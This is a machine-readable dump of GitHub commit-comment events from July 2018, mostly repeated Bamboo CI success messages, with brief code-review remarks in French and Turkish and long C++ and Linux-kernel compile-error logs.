{"id":"7966187652","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710193,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-14T18:39:44Z","updated_at":"2018-07-14T18:39:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:39:44Z"}
{"id":"7966187767","type":"CommitCommentEvent","actor":{"login":"atlj"},"repo":{"name":"easyly471/project_zero"},"payload":{"comment":{"id":29710194,"position":null,"line":null,"path":null,"commit_id":"68d05dd33c73f86b22137f1c7ade2134caf85ca1","created_at":"2018-07-14T18:39:51Z","updated_at":"2018-07-14T18:39:51Z","author_association":"COLLABORATOR","body":"Ben programcinin map kullanmayanini severim\r\n-muharrem ince"}},"created_at":"2018-07-14T18:39:51Z"}
{"id":"7966188200","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710195,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-14T18:40:09Z","updated_at":"2018-07-14T18:40:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:40:09Z"}
{"id":"7966188595","type":"CommitCommentEvent","actor":{"login":"darnuria"},"repo":{"name":"mart1ver/oressource"},"payload":{"comment":{"id":29710196,"position":4,"line":69,"path":"api/ventes.php","commit_id":"3deb7bc6b00da6f4e38d4bc89ec22b162662500a","created_at":"2018-07-14T18:40:23Z","updated_at":"2018-07-14T18:40:23Z","author_association":"COLLABORATOR","body":"@mart1ver: Coté client on envoie au serveur un 'id_object' à `NULL`. Faudra sûrement corriger aussi et trancher sur comment gérer par exemple les \"matériaux électriques\" (types dechets sans objet associé."}},"created_at":"2018-07-14T18:40:23Z"}
{"id":"7966188961","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710197,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-14T18:40:43Z","updated_at":"2018-07-14T18:40:43Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-14T18:40:43Z"}
{"id":"7966189123","type":"CommitCommentEvent","actor":{"login":"tom-sqlprosolutions"},"repo":{"name":"tom-sqlprosolutions/hello-source-control"},"payload":{"comment":{"id":29710198,"position":null,"line":null,"path":null,"commit_id":"57e4003b074bb480add68413e20d5fdca3a63ff5","created_at":"2018-07-14T18:40:52Z","updated_at":"2018-07-14T18:40:52Z","author_association":"OWNER","body":"In this case we used reset to move back to a commit and then amend to change the commit message. I might imagine we can do this in GitHub as well."}},"created_at":"2018-07-14T18:40:52Z"}
{"id":"7966189156","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710199,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-14T18:40:53Z","updated_at":"2018-07-14T18:40:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:40:53Z"}
{"id":"7966189845","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710200,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-14T18:41:19Z","updated_at":"2018-07-14T18:41:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:41:19Z"}
{"id":"7966190323","type":"CommitCommentEvent","actor":{"login":"darnuria"},"repo":{"name":"mart1ver/oressource"},"payload":{"comment":{"id":29710201,"position":6,"line":125,"path":"ifaces/ventes.php","commit_id":"3deb7bc6b00da6f4e38d4bc89ec22b162662500a","created_at":"2018-07-14T18:41:43Z","updated_at":"2018-07-14T18:41:43Z","author_association":"COLLABORATOR","body":"@mart1ver Tu trouve ça pratique le micro-curseur? Je suis d'accord sur l'idée de passer en type `number notamment pour les lecteurs d’écrans. Mais faudrait trouver un CSS qui nous enlève ce petit cursur non? Dit moi si je chipotte ;)"}},"created_at":"2018-07-14T18:41:43Z"}
{"id":"7966190747","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29710202,"position":null,"line":null,"path":null,"commit_id":"8a383eeced4c82243da2d2562b35448c209c945b","created_at":"2018-07-14T18:42:05Z","updated_at":"2018-07-14T18:42:05Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[  1%] Built target glew\n[ 10%] Built target box2d\n[ 38%] Built target sp2freetype\n[ 44%] Built target lua\n[ 75%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/home/daid/_tinyci/daid/SeriousProton2/src/collision/2d/chains.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:494: recipe for target 'CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o' failed\nCMakeFiles/Fuseblaze.dir/build.make:326: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/sectorLoader.cpp:7:21: fatal error: winsock.h: No such file or directory\n #include <winsock.h>\n                     ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:26:18: error: 'virtual void ShadowRenderPass::render(sp::P<sp::GraphicsLayer>, float)' marked 'override', but does not override\n     virtual void render(sp::P<sp::GraphicsLayer> layer, float aspect_ratio) override\n                  ^~~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h: In constructor 'ShadowRenderPass::ShadowRenderPass(sp::P<sp::Scene>, sp::P<sp::Camera>)':\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h: In member function 'virtual void ShadowRenderPass::render(sp::P<sp::GraphicsLayer>, float)':\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:32:30: error: 'class sp::RenderQueue' has no member named 'clear'\n             pre_shadow_queue.clear();\n                              ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:33:26: error: 'class sp::RenderQueue' has no member named 'clear'\n             shadow_queue.clear();\n                          ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:34:36: error: 'class sp::RenderQueue' has no member named 'clear'\n             player_shadow_queue[0].clear();\n                                    ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:35:36: error: 'class sp::RenderQueue' has no member named 'clear'\n             player_shadow_queue[1].clear();\n                                    ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:36:31: error: 'class sp::RenderQueue' has no member named 'clear'\n             post_shadow_queue.clear();\n                               ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:40:106: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n             pre_shadow_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                          ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:55:106: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n                 shadow_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                          ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:56:116: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n                 player_shadow_queue[n].render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                                    ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:68:107: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n                 overlay_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                           ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:73:107: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n             post_shadow_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                           ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp: In function 'int main(int, char**)':\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:160:57: error: invalid new-expression of abstract class type 'ShadowRenderPass'\n         shadow_pass = new ShadowRenderPass(scene, camera);\n                                                         ^\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:6:7: note:   because the following virtual functions are pure within 'ShadowRenderPass':\n class ShadowRenderPass : public sp::RenderPass\n       ^~~~~~~~~~~~~~~~\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:4:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:16:18: note: \tvirtual void sp::RenderPass::renderSetup(float)\n     virtual void renderSetup(float aspect_ratio) = 0;\n                  ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:17:18: note: \tvirtual void sp::RenderPass::renderExecute()\n     virtual void renderExecute() = 0;\n                  ^~~~~~~~~~~~~\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-14T18:42:05Z"}
{"id":"7966190758","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710203,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-14T18:42:06Z","updated_at":"2018-07-14T18:42:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:42:06Z"}
{"id":"7966191247","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710204,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-14T18:42:29Z","updated_at":"2018-07-14T18:42:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:42:29Z"}
{"id":"7966191672","type":"CommitCommentEvent","actor":{"login":"68foxboris"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29710205,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-14T18:42:50Z","updated_at":"2018-07-14T18:42:50Z","author_association":"NONE","body":"Error compile kernel 4.1.37 for et11000.\r\nI add this patch [patch for kernel 4.1.37.zip](https://github.com/oe-alliance/oe-alliance-core/files/2195163/patch.for.kernel.4.1.37.zip) error compile\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/include/linux/kernel.h:823:34: error: invalid operands to binary + (have 'void *' and 'void *')\r\n  (BUILD_BUG_ON_ZERO((perms) < 0) +    \\\r\n                                  ^\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/include/linux/moduleparam.h:223:31: note: in expansion of macro 'VERIFY_OCTAL_PERMISSIONS'\r\n  = { __param_str_##name, ops, VERIFY_OCTAL_PERMISSIONS(perm), \\\r\n                               ^~~~~~~~~~~~~~~~~~~~~~~~\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/include/linux/moduleparam.h:312:2: note: in expansion of macro '__module_param_call'\r\n  __module_param_call(\"\", name, &param_ops_##type, &var, perm, -1, 0)\r\n  ^~~~~~~~~~~~~~~~~~~\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/init/main.c:693:1: note: in expansion of macro 'core_param'\r\n core_param(initcall_debug, initcall_debug, bool, 0644);\r\n ^~~~~~~~~~\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/init/main.c: In function 'do_initcalls':\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/init/main.c:861:24: warning: comparison between pointer and integer\r\n  for (level = 0; level < ARRAY_SIZE(initcall_levels) - 1; level++)\r\n                        ^\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/scripts/Makefile.build:258: recipe for target 'init/main.o' failed\r\nmake[3]: *** [init/main.o] Error 1\r\n/home/foxbob/et8/build/tmp/work-shared/et1x000/kernel-source/Makefile:950: recipe for target 'init' failed\r\nmake[2]: *** [init] Error 2"}},"created_at":"2018-07-14T18:42:50Z"}
